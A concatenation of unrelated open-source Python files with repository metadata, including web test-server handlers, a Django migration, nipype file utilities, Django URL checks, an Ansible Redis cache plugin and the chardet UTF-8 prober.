return "<%s base_path:%s url_base:%s>" % (self.__class__.__name__, self.base_path, self.url_base)
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
try:
environ = {"__file__": path}
execfile(path, environ, environ)
if "main" in environ:
handler = FunctionHandler(environ["main"])
handler(request, response)
else:
raise HTTPException(500, "No main function in script %s" % path)
except IOError:
raise HTTPException(404)
python_script_handler = PythonScriptHandler()
class FunctionHandler(object):
def __init__(self, func):
self.func = func
def __call__(self, request, response):
try:
rv = self.func(request, response)
except Exception:
msg = traceback.format_exc()
raise HTTPException(500, message=msg)
if rv is not None:
if isinstance(rv, tuple):
if len(rv) == 3:
status, headers, content = rv
response.status = status
elif len(rv) == 2:
headers, content = rv
else:
raise HTTPException(500)
response.headers.update(headers)
else:
content = rv
response.content = content
#The generic name here is so that this can be used as a decorator
def handler(func):
return FunctionHandler(func)
class JsonHandler(object):
def __init__(self, func):
self.func = func
def __call__(self, request, response):
return FunctionHandler(self.handle_request)(request, response)
def handle_request(self, request, response):
rv = self.func(request, response)
response.headers.set("Content-Type", "application/json")
enc = json.dumps
if isinstance(rv, tuple):
rv = list(rv)
value = tuple(rv[:-1] + [enc(rv[-1])])
length = len(value[-1])
else:
value = enc(rv)
length = len(value)
response.headers.set("Content-Length", length)
return value
def json_handler(func):
return JsonHandler(func)
class AsIsHandler(object):
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
def __call__(self, request, response):
path = filesystem_path(self.base_path, request, self.url_base)
try:
with open(path) as f:
response.writer.write_content(f.read())
response.close_connection = True
except IOError:
raise HTTPException(404)
as_is_handler = AsIsHandler()
class BasicAuthHandler(object):
def __init__(self, handler, user, password):
"""
A Basic Auth handler
:Args:
- handler: a secondary handler for the request after authentication is successful (example file_handler)
- user: string of the valid user name or None if any / all credentials are allowed
- password: string of the password required
"""
self.user = user
self.password = password
self.handler = handler
def __call__(self, request, response):
if "authorization" not in request.headers:
response.status = 401
response.headers.set("WWW-Authenticate", "Basic")
return response
else:
auth = Authentication(request.headers)
if self.user is not None and (self.user != auth.username or self.password != auth.password):
response.set_error(403, "Invalid username or password")
return response
return self.handler(request, response)
basic_auth_handler = BasicAuthHandler(file_handler, None, None)
class ErrorHandler(object):
def __init__(self, status):
self.status = status
def __call__(self, request, response):
response.set_error(self.status)
class StaticHandler(object):
def __init__(self, path, format_args, content_type, **headers):
"""Hander that reads a file from a path and substitutes some fixed data
:param path: Path to the template file to use
:param format_args: Dictionary of values to substitute into the template file
:param content_type: Content type header to server the response with
:param headers: List of headers to send with responses"""
with open(path) as f:
self.data = f.read() % format_args
self.resp_headers = [("Content-Type", content_type)]
for k, v in headers.iteritems():
resp_headers.append((k.replace("_", "-"), v))
self.handler = handler(self.handle_request)
def handle_request(self, request, response):
return self.resp_headers, self.data
def __call__(self, request, response):
rv = self.handler(request, response)
return rv
| mpl-2.0 |
alonisser/Open-Knesset | persons/migrations/0001_initial.py | 15 | 12661 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Title'
db.create_table('persons_title', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
))
db.send_create_signal('persons', ['Title'])
# Adding model 'Person'
db.create_table('persons_person', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('mk', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='person', null=True, to=orm['mks.Member'])),
))
db.send_create_signal('persons', ['Person'])
# Adding M2M table for field titles on 'Person'
db.create_table('persons_person_titles', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('person', models.ForeignKey(orm['persons.person'], null=False)),
('title', models.ForeignKey(orm['persons.title'], null=False))
))
db.create_unique('persons_person_titles', ['person_id', 'title_id'])
# Adding model 'Role'
db.create_table('persons_role', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('text', self.gf('django.db.models.fields.CharField')(max_length=1024, null=True, blank=True)),
('person', self.gf('django.db.models.fields.related.ForeignKey')(related_name='roles', to=orm['persons.Person'])),
))
db.send_create_signal('persons', ['Role'])
def backwards(self, orm):
# Deleting model 'Title'
db.delete_table('persons_title')
# Deleting model 'Person'
db.delete_table('persons_person')
# Removing M2M table for field titles on 'Person'
db.delete_table('persons_person_titles')
# Deleting model 'Role'
db.delete_table('persons_role')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'mks.member': {
'Meta': {'object_name': 'Member'},
'area_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'average_monthly_committee_presence': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'average_weekly_presence_hours': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'bills_stats_approved': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'bills_stats_first': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'bills_stats_pre': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'bills_stats_proposed': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'blog': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['planet.Blog']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'current_party': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': "orm['mks.Party']"}),
'current_role_descriptions': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_of_death': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'family_status': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'img_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_children': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'parties': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'all_members'", 'symmetrical': 'False', 'through': "orm['mks.Membership']", 'to': "orm['mks.Party']"}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'}),
'place_of_birth': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'place_of_residence_lat': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'place_of_residence_lon': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'residence_centrality': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'residence_economy': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_of_aliyah': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'mks.membership': {
'Meta': {'object_name': 'Membership'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Member']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mks.Party']"}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'mks.party': {
'Meta': {'object_name': 'Party'},
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_coalition': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'number_of_members': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'number_of_seats': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'persons.person': {
'Meta': {'object_name': 'Person'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mk': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'person'", 'null': 'True', 'to': "orm['mks.Member']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'titles': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'persons'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['persons.Title']"})
},
'persons.role': {
'Meta': {'object_name': 'Role'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'roles'", 'to': "orm['persons.Person']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'})
},
'persons.title': {
'Meta': {'object_name': 'Title'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'planet.blog': {
'Meta': {'object_name': 'Blog'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '1024', 'db_index': 'True'})
}
}
complete_apps = ['persons']
| bsd-3-clause |
rameshvs/nipype | nipype/utils/filemanip.py | 3 | 12109 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Miscellaneous file manipulation functions
"""
import cPickle
from glob import glob
import gzip
import hashlib
from hashlib import md5
import json
import os
import re
import shutil
import numpy as np
from ..interfaces.traits_extension import isdefined
from .misc import is_container
from .. import logging, config
fmlogger = logging.getLogger("filemanip")
class FileNotFoundError(Exception):
pass
def split_filename(fname):
"""Split a filename into parts: path, base filename and extension.
Parameters
----------
fname : str
file or path name
Returns
-------
pth : str
base path from fname
fname : str
filename from fname, without extension
ext : str
file extension from fname
Examples
--------
>>> from nipype.utils.filemanip import split_filename
>>> pth, fname, ext = split_filename('/home/data/subject.nii.gz')
>>> pth
'/home/data'
>>> fname
'subject'
>>> ext
'.nii.gz'
"""
special_extensions = [".nii.gz", ".tar.gz"]
if fname and fname.endswith(os.path.sep):
fname = fname[:-1]
pth, fname = os.path.split(fname)
ext = None
for special_ext in special_extensions:
ext_len = len(special_ext)
if (len(fname) > ext_len) and \
(fname[-ext_len:].lower() == special_ext.lower()):
ext = fname[-ext_len:]
fname = fname[:-ext_len]
break
if not ext:
fname, ext = os.path.splitext(fname)
return pth, fname, ext
def fname_presuffix(fname, prefix='', suffix='', newpath=None, use_ext=True):
"""Manipulates path and name of input filename
Parameters
----------
fname : string
A filename (may or may not include path)
prefix : string
Characters to prepend to the filename
suffix : string
Characters to append to the filename
newpath : string
Path to replace the path of the input fname
use_ext : boolean
If True (default), appends the extension of the original file
to the output name.
Returns
-------
Absolute path of the modified filename
>>> from nipype.utils.filemanip import fname_presuffix
>>> fname = 'foo.nii.gz'
>>> fname_presuffix(fname,'pre','post','/tmp')
'/tmp/prefoopost.nii.gz'
"""
pth, fname, ext = split_filename(fname)
if not use_ext:
ext = ''
if newpath and isdefined(newpath):
pth = os.path.abspath(newpath)
return os.path.join(pth, prefix + fname + suffix + ext)
def fnames_presuffix(fnames, prefix='', suffix='', newpath=None, use_ext=True):
"""Calls fname_presuffix for a list of files.
"""
f2 = []
for fname in fnames:
f2.append(fname_presuffix(fname, prefix, suffix, newpath, use_ext))
return f2
def hash_rename(filename, hashvalue):
"""renames a file given original filename and hash
and sets path to output_directory
"""
path, name, ext = split_filename(filename)
newfilename = ''.join((name, '_0x', hashvalue, ext))
return os.path.join(path, newfilename)
def check_forhash(filename):
"""checks if file has a hash in its filename"""
if isinstance(filename, list):
filename = filename[0]
path, name = os.path.split(filename)
if re.search('(_0x[a-z0-9]{32})', name):
hashvalue = re.findall('(_0x[a-z0-9]{32})', name)
return True, hashvalue
else:
return False, None
def hash_infile(afile, chunk_len=8192, crypto=hashlib.md5):
""" Computes hash of a file using 'crypto' module"""
hex = None
if os.path.isfile(afile):
crypto_obj = crypto()
fp = file(afile, 'rb')
while True:
data = fp.read(chunk_len)
if not data:
break
crypto_obj.update(data)
fp.close()
hex = crypto_obj.hexdigest()
return hex
def hash_timestamp(afile):
""" Computes md5 hash of the timestamp of a file """
md5hex = None
if os.path.isfile(afile):
md5obj = md5()
stat = os.stat(afile)
md5obj.update(str(stat.st_size))
md5obj.update(str(stat.st_mtime))
md5hex = md5obj.hexdigest()
return md5hex
def copyfile(originalfile, newfile, copy=False, create_new=False,
hashmethod=None):
"""Copy or symlink ``originalfile`` to ``newfile``.
Parameters
----------
originalfile : str
full path to original file
newfile : str
full path to new file
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for POSIX systems
Returns
-------
None
"""
newhash = None
orighash = None
fmlogger.debug(newfile)
if create_new:
while os.path.exists(newfile):
base, fname, ext = split_filename(newfile)
s = re.search('_c[0-9]{4,4}$', fname)
i = 0
if s:
i = int(s.group()[2:])+1
fname = fname[:-6] + "_c%04d" % i
else:
fname += "_c%04d" % i
newfile = base + os.sep + fname + ext
if hashmethod is None:
hashmethod = config.get('execution', 'hash_method').lower()
elif os.path.exists(newfile):
if hashmethod == 'timestamp':
newhash = hash_timestamp(newfile)
elif hashmethod == 'content':
newhash = hash_infile(newfile)
fmlogger.debug("File: %s already exists,%s, copy:%d"
% (newfile, newhash, copy))
#the following seems unnecessary
#if os.name is 'posix' and copy:
# if os.path.lexists(newfile) and os.path.islink(newfile):
# os.unlink(newfile)
# newhash = None
if os.name is 'posix' and not copy:
if os.path.lexists(newfile):
if hashmethod == 'timestamp':
orighash = hash_timestamp(originalfile)
elif hashmethod == 'content':
orighash = hash_infile(originalfile)
fmlogger.debug('Original hash: %s, %s' % (originalfile, orighash))
if newhash != orighash:
os.unlink(newfile)
if (newhash is None) or (newhash != orighash):
os.symlink(originalfile, newfile)
else:
if newhash:
if hashmethod == 'timestamp':
orighash = hash_timestamp(originalfile)
elif hashmethod == 'content':
orighash = hash_infile(originalfile)
if (newhash is None) or (newhash != orighash):
try:
fmlogger.debug("Copying File: %s->%s" % (newfile, originalfile))
shutil.copyfile(originalfile, newfile)
except shutil.Error, e:
fmlogger.warn(e.message)
else:
fmlogger.debug("File: %s already exists, not overwriting, copy:%d"
% (newfile, copy))
if originalfile.endswith(".img"):
hdrofile = originalfile[:-4] + ".hdr"
hdrnfile = newfile[:-4] + ".hdr"
matofile = originalfile[:-4] + ".mat"
if os.path.exists(matofile):
matnfile = newfile[:-4] + ".mat"
copyfile(matofile, matnfile, copy)
copyfile(hdrofile, hdrnfile, copy)
elif originalfile.endswith(".BRIK"):
hdrofile = originalfile[:-4] + ".HEAD"
hdrnfile = newfile[:-4] + ".HEAD"
copyfile(hdrofile, hdrnfile, copy)
return newfile
def get_related_files(filename):
"""Returns a list of related files for Nifti-Pair, Analyze (SPM) and AFNI
files
"""
related_files = []
if filename.endswith(".img") or filename.endswith(".hdr"):
path, name, ext = split_filename(filename)
for ext in ['.hdr', '.img', '.mat']:
related_files.append(os.path.join(path, name + ext))
elif filename.endswith(".BRIK") or filename.endswith(".HEAD"):
path, name, ext = split_filename(filename)
for ext in ['.BRIK', '.HEAD']:
related_files.append(os.path.join(path, name + ext))
if not len(related_files):
related_files = [filename]
return related_files
def copyfiles(filelist, dest, copy=False, create_new=False):
"""Copy or symlink files in ``filelist`` to ``dest`` directory.
Parameters
----------
filelist : list
List of files to copy.
dest : path/files
full path to destination. If it is a list of length greater
than 1, then it assumes that these are the names of the new
files.
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for posix systems
Returns
-------
None
"""
outfiles = filename_to_list(dest)
newfiles = []
for i, f in enumerate(filename_to_list(filelist)):
if isinstance(f, list):
newfiles.insert(i, copyfiles(f, dest, copy=copy,
create_new=create_new))
else:
if len(outfiles) > 1:
destfile = outfiles[i]
else:
destfile = fname_presuffix(f, newpath=outfiles[0])
destfile = copyfile(f, destfile, copy, create_new=create_new)
newfiles.insert(i, destfile)
return newfiles
def filename_to_list(filename):
"""Returns a list given either a string or a list
"""
if isinstance(filename, (str, unicode)):
return [filename]
elif isinstance(filename, list):
return filename
elif is_container(filename):
return [x for x in filename]
else:
return None
def list_to_filename(filelist):
"""Returns a list if filelist is a list of length greater than 1,
otherwise returns the first element
"""
if len(filelist) > 1:
return filelist
else:
return filelist[0]
def save_json(filename, data):
"""Save data to a json file
Parameters
----------
filename : str
Filename to save data in.
data : dict
Dictionary to save in json file.
"""
fp = file(filename, 'w')
json.dump(data, fp, sort_keys=True, indent=4)
fp.close()
def load_json(filename):
"""Load data from a json file
Parameters
----------
filename : str
Filename to load data from.
Returns
-------
data : dict
"""
fp = file(filename, 'r')
data = json.load(fp)
fp.close()
return data
def loadcrash(infile, *args):
if '.pkl' in infile:
return loadpkl(infile)
elif '.npz' in infile:
DeprecationWarning(('npz files will be deprecated in the next '
'release. you can use numpy to open them.'))
data = np.load(infile)
out = {}
for k in data.files:
out[k] = [f for f in data[k].flat]
if len(out[k]) == 1:
out[k] = out[k].pop()
return out
else:
raise ValueError('Only pickled crashfiles are supported')
def loadpkl(infile):
"""Load a zipped or plain cPickled file
"""
if infile.endswith('pklz'):
pkl_file = gzip.open(infile, 'rb')
else:
pkl_file = open(infile)
return cPickle.load(pkl_file)
def savepkl(filename, record):
if filename.endswith('pklz'):
pkl_file = gzip.open(filename, 'wb')
else:
pkl_file = open(filename, 'wb')
cPickle.dump(record, pkl_file)
pkl_file.close()
rst_levels = ['=', '-', '~', '+']
def write_rst_header(header, level=0):
return '\n'.join((header, ''.join([rst_levels[level]
for _ in header]))) + '\n\n'
def write_rst_list(items, prefix=''):
out = []
for item in items:
out.append(prefix + ' ' + str(item))
return '\n'.join(out)+'\n\n'
def write_rst_dict(info, prefix=''):
out = []
for key, value in sorted(info.items()):
out.append(prefix + '* ' + key + ' : ' + str(value))
return '\n'.join(out)+'\n\n'
| bsd-3-clause |
cgstudiomap/cgstudiomap | main/eggs/Django-1.9-py2.7.egg/django/core/checks/urls.py | 110 | 2727 | from __future__ import unicode_literals
from . import Tags, Warning, register
@register(Tags.urls)
def check_url_config(app_configs, **kwargs):
from django.core.urlresolvers import get_resolver
resolver = get_resolver()
return check_resolver(resolver)
def check_resolver(resolver):
"""
Recursively check the resolver.
"""
from django.core.urlresolvers import RegexURLPattern, RegexURLResolver
warnings = []
for pattern in resolver.url_patterns:
if isinstance(pattern, RegexURLResolver):
warnings.extend(check_include_trailing_dollar(pattern))
# Check resolver recursively
warnings.extend(check_resolver(pattern))
elif isinstance(pattern, RegexURLPattern):
warnings.extend(check_pattern_name(pattern))
warnings.extend(check_pattern_startswith_slash(pattern))
return warnings
def describe_pattern(pattern):
"""
Format the URL pattern for display in warning messages.
"""
description = "'{}'".format(pattern.regex.pattern)
if getattr(pattern, 'name', False):
description += " [name='{}']".format(pattern.name)
return description
def check_include_trailing_dollar(pattern):
"""
Check that include is not used with a regex ending with a dollar.
"""
regex_pattern = pattern.regex.pattern
if regex_pattern.endswith('$') and not regex_pattern.endswith('\$'):
warning = Warning(
"Your URL pattern {} uses include with a regex ending with a '$'. "
"Remove the dollar from the regex to avoid problems including "
"URLs.".format(describe_pattern(pattern)),
id="urls.W001",
)
return [warning]
else:
return []
def check_pattern_startswith_slash(pattern):
"""
Check that the pattern does not begin with a forward slash.
"""
regex_pattern = pattern.regex.pattern
if regex_pattern.startswith('/') or regex_pattern.startswith('^/'):
warning = Warning(
"Your URL pattern {} has a regex beginning with a '/'. "
"Remove this slash as it is unnecessary.".format(describe_pattern(pattern)),
id="urls.W002",
)
return [warning]
else:
return []
def check_pattern_name(pattern):
"""
Check that the pattern name does not contain a colon.
"""
if pattern.name is not None and ":" in pattern.name:
warning = Warning(
"Your URL pattern {} has a name including a ':'. Remove the colon, to "
"avoid ambiguous namespace references.".format(describe_pattern(pattern)),
id="urls.W003",
)
return [warning]
else:
return []
| agpl-3.0 |
Slezhuk/ansible | lib/ansible/plugins/cache/redis.py | 36 | 3530 | # (c) 2014, Brian Coca, Josh Drake, et al
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import time
import json
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.plugins.cache import BaseCacheModule
try:
from redis import StrictRedis
except ImportError:
raise AnsibleError("The 'redis' python module is required for the redis fact cache, 'pip install redis'")
class CacheModule(BaseCacheModule):
"""
A caching module backed by redis.
Keys are maintained in a zset with their score being the timestamp
when they are inserted. This allows for the usage of 'zremrangebyscore'
to expire keys. This mechanism is used or a pattern matched 'scan' for
performance.
"""
def __init__(self, *args, **kwargs):
if C.CACHE_PLUGIN_CONNECTION:
connection = C.CACHE_PLUGIN_CONNECTION.split(':')
else:
connection = []
self._timeout = float(C.CACHE_PLUGIN_TIMEOUT)
self._prefix = C.CACHE_PLUGIN_PREFIX
self._cache = StrictRedis(*connection)
self._keys_set = 'ansible_cache_keys'
def _make_key(self, key):
return self._prefix + key
def get(self, key):
value = self._cache.get(self._make_key(key))
# guard against the key not being removed from the zset;
# this could happen in cases where the timeout value is changed
# between invocations
if value is None:
self.delete(key)
raise KeyError
return json.loads(value)
def set(self, key, value):
value2 = json.dumps(value)
if self._timeout > 0: # a timeout of 0 is handled as meaning 'never expire'
self._cache.setex(self._make_key(key), int(self._timeout), value2)
else:
self._cache.set(self._make_key(key), value2)
self._cache.zadd(self._keys_set, time.time(), key)
def _expire_keys(self):
if self._timeout > 0:
expiry_age = time.time() - self._timeout
self._cache.zremrangebyscore(self._keys_set, 0, expiry_age)
def keys(self):
self._expire_keys()
return self._cache.zrange(self._keys_set, 0, -1)
def contains(self, key):
self._expire_keys()
return (self._cache.zrank(self._keys_set, key) >= 0)
def delete(self, key):
self._cache.delete(self._make_key(key))
self._cache.zrem(self._keys_set, key)
def flush(self):
for key in self.keys():
self.delete(key)
def copy(self):
# TODO: there is probably a better way to do this in redis
ret = dict()
for key in self.keys():
ret[key] = self.get(key)
return ret
def __getstate__(self):
return dict()
def __setstate__(self, data):
self.__init__()
| gpl-3.0 |
Dingmatt/AMSA | Plug-ins/Amsa.bundle/Contents/Libraries/Shared/chardet/utf8prober.py | 290 | 2766 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .enums import ProbingState, MachineState
from .codingstatemachine import CodingStateMachine
from .mbcssm import UTF8_SM_MODEL
class UTF8Prober(CharSetProber):
ONE_CHAR_PROB = 0.5
def __init__(self):
super(UTF8Prober, self).__init__()
self.coding_sm = CodingStateMachine(UTF8_SM_MODEL)
self._num_mb_chars = None
self.reset()
def reset(self):
super(UTF8Prober, self).reset()
self.coding_sm.reset()
self._num_mb_chars = 0
@property
def charset_name(self):
return "utf-8"
@property
def language(self):
return ""
def feed(self, byte_str):
for c in byte_str:
coding_state = self.coding_sm.next_state(c)
if coding_state == MachineState.ERROR:
self._state = ProbingState.NOT_ME
break
elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
break
elif coding_state == MachineState.START:
if self.coding_sm.get_current_charlen() >= 2:
self._num_mb_chars += 1
if self.state == ProbingState.DETECTING:
if self.get_confidence() > self.SHORTCUT_THRESHOLD:
self._state = ProbingState.FOUND_IT
return self.state
def get_confidence(self):
unlike = 0.99
if self._num_mb_chars < 6:
unlike *= self.ONE_CHAR_PROB ** self._num_mb_chars
return 1.0 - unlike
else:
return unlike
| gpl-3.0 |
fhartwig/adhocracy3.mercator | src/adhocracy_core/adhocracy_core/resources/test_simple.py | 2 | 1213 | from pyramid import testing
from pytest import fixture
from pytest import mark
def test_simple_meta():
import adhocracy_core.sheets
from .simple import simple_meta
from .simple import ISimple
meta = simple_meta
assert meta.iresource is ISimple
assert meta.basic_sheets == (adhocracy_core.sheets.name.IName,
adhocracy_core.sheets.title.ITitle,
adhocracy_core.sheets.metadata.IMetadata,
adhocracy_core.sheets.workflow.IWorkflowAssignment,
)
assert meta.permission_create == 'create_simple'
@mark.usefixtures('integration')
class TestSimple:
@fixture
def context(self, pool):
return pool
def test_create_simple(self, context, registry):
from adhocracy_core.resources.simple import ISimple
from adhocracy_core.sheets.name import IName
appstructs = {IName.__identifier__: {'name': 'name1'}}
res = registry.content.create(ISimple.__identifier__,
appstructs=appstructs,
parent=context)
assert ISimple.providedBy(res)
| agpl-3.0 |
lgarren/spack | var/spack/repos/builtin/packages/htop/package.py | 3 | 1705 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
